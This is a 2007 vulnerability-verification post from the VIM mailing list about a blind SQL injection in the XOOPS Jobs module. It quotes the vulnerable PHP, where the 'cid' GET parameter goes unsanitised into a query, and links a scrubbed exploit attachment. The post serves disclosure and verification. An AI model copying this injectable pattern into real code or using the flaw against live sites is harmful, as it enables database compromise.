[VIM] true: XOOPS Module Jobs <= 2.4 (cid) SQL Injection Exploit
str0ke
str0ke at milw0rm.com
Thu Apr 5 21:13:07 UTC 2007
XOOPS Module Job Listings <= 2.1 (cid) Remote BLIND SQL Injection Exploit
http://www.milw0rm.com/exploits/3672
The correct name should be Jobs and the sourcecode below is for the
latest version 2.4.
vendor url: http://www.jlmzone.com/
########### modules index.php ##############
pa = isset( $_GET['pa'] ) ? $_GET['pa'] : '' ;
$lid = isset( $_GET['lid'] ) ? $_GET['lid'] : '' ;
$cid = isset( $_GET['cid'] ) ? $_GET['cid'] : '' ;
$debut = isset( $_GET['debut'] ) ? $_GET['debut'] : '' ;
switch($pa)
{
case "jobsview":
$xoopsOption['template_main'] = 'jobs_category.html';
include(XOOPS_ROOT_PATH."/header.php");
jobsview($cid, $debut);
break;
########### function jobsview #########
$requete = $xoopsDB->query("select cid, pid, title from
".$xoopsDB->prefix("jobs_categories")." where cid=".$cid."");
list($ccid, $pid, $title) = $xoopsDB->fetchRow($requete);
$title = $myts->makeTboxData4Show($title);
$varid[$x]=$ccid;
$varnom[$x]=$title;
##################################
/str0ke
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xoopsjobexp.zip
Type: application/zip
Size: 1135 bytes
Desc: not available
Url : http://www.attrition.org/pipermail/vim/attachments/20070405/ac3dbd51/attachment.zip
More information about the VIM
mailing list